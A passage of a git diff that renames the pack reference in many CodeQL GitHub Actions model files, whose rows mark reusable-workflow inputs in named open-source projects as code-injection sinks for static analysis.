@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index f8b490726da9..253c82f4bef9 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index 889499eea3d3..eb1b3df774d9 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 2dce19050ed7..3c6e1aaf658e 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] @@ -10,7 +10,7 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index c80f8e732b64..3f66f2878303 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index b85a11d81f2e..b45eabdf202b 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index f8102400cc72..76bb69800a9a 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 1af7b8322035..9af37394143f 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index c0688a4a5e06..9d0113eb8ece 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 4e91308a0049..90ad3c0f9a18 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index bc42c619599d..e07d783ae53d 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index 68925b294bb6..3d698b0a84b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index c3ff42ed6049..364bd19139e0 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 964436f33ca8..85d150cf11c6 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 995940550e19..612a114d79cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 93653f07819e..86267e5a9217 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 961070778cfd..31d0192f3fba 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 9f1cc82523cc..5116c943f690 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 68babc09b6a1..85cb45df8951 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index f4271e5424b1..4167f4bb982a 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index f20f7997d3c4..04b9325cecd9 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index da5617fd144d..60b966d98a4a 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 78821b4dad3c..bbca585931c5 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index f0c9290ca22e..a0b7c4189672 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 21d236989316..663826781e7a 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index ac38cac602d5..c0b8992a6786 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index a9f87db955ea..a7069a8fa4fa 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 99c706b0c28b..3ec3c008301a 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index f8d0172d684b..f4c09189ba64 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 5afda471f8b7..46b715358e06 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 4e5ca50ccec1..ca728bfced25 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index 02801615bd51..c31b5c8fe0c6 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index d808d612857f..e53c0a2780b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index e543dc8b7f34..2c904674125a 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index 891d902f4709..cff10b709e9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index 334d64dfbece..31e4dbbf7ab6 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 2c600cd7f7d3..5aca8a7070da 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index cc6c4e620e60..179c882eba19 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index efbf050ddc96..a702bdd47843 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index 9860bd3ab92f..105a5b49f3dd 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index c160c29f6f63..4e4aa9f79861 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 910715eece07..4272f3376ce1 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] 
@@ -15,7 +15,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index f04e67670d3b..4752bce29b9f 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index 3d5fa057987c..e493955ca4cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml 
@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 31d0e691e7f6..e3c0040f7dfb 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index 5f9da314f90b..daaa34ab8ab1 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 7ae494adb2b8..9bfe61804816 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index dce969719d29..d8cd44f08ee9 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] diff --git 